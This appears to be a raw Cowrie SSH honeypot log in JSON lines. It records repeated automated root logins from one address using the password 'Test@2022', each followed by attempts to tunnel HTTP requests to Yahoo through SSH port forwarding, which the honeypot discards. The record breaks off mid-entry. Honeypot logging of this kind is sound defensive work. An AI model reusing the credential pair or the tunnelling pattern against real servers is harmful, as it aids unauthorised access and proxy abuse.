{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.528992Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.576802Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31829,"dst_ip":"1.2.3.4","dst_port":22,"session":"ded4bb3c940f","protocol":"ssh","message":"New connection: 213.209.150.239:31829 (1.2.3.4:22) [session: ded4bb3c940f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.622830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.623939Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.670854Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.905452Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24900,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24900","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.953213Z","session":"ded4bb3c940f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.000314Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28278,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28278","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.137377Z","session":"ded4bb3c940f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.185146Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.233962Z","src_ip":"213.209.150.239","session":"ded4bb3c940f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31926,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b847d7ad92","protocol":"ssh","message":"New connection: 213.209.150.239:31926 (1.2.3.4:22) [session: 34b847d7ad92]","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.280141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.281034Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.328000Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.562400Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12461,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12461","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.610178Z","session":"34b847d7ad92"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.657513Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":4133,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4133","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.793653Z","session":"34b847d7ad92"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.840920Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.889011Z","src_ip":"213.209.150.239","session":"34b847d7ad92"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31982,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1fa8cbb14e4","protocol":"ssh","message":"New connection: 213.209.150.239:31982 (1.2.3.4:22) [session: b1fa8cbb14e4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.944297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:34.945066Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.001673Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.283205Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23470,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23470","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.341466Z","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.398133Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17137,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17137","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.554879Z","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.611376Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.668573Z","src_ip":"213.209.150.239","session":"b1fa8cbb14e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32055,"dst_ip":"1.2.3.4","dst_port":22,"session":"e965f57cbaad","protocol":"ssh","message":"New connection: 213.209.150.239:32055 (1.2.3.4:22) [session: e965f57cbaad]","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.714982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.715856Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.763105Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:35.998132Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20439,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20439","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.046579Z","session":"e965f57cbaad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.094152Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16400,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16400","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.229707Z","session":"e965f57cbaad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.276915Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.325053Z","src_ip":"213.209.150.239","session":"e965f57cbaad"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32182,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1da968c344","protocol":"ssh","message":"New connection: 213.209.150.239:32182 (1.2.3.4:22) [session: fa1da968c344]","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.380739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.381919Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.438648Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.721365Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26652,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26652","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.779185Z","session":"fa1da968c344"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.835915Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21307,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21307","sensor":"my-vps","timestamp":"2025-08-26T01:04:36.991088Z","session":"fa1da968c344"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.047627Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.105432Z","src_ip":"213.209.150.239","session":"fa1da968c344"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32303,"dst_ip":"1.2.3.4","dst_port":22,"session":"68af63f46de3","protocol":"ssh","message":"New connection: 213.209.150.239:32303 (1.2.3.4:22) [session: 68af63f46de3]","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.151666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.152739Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1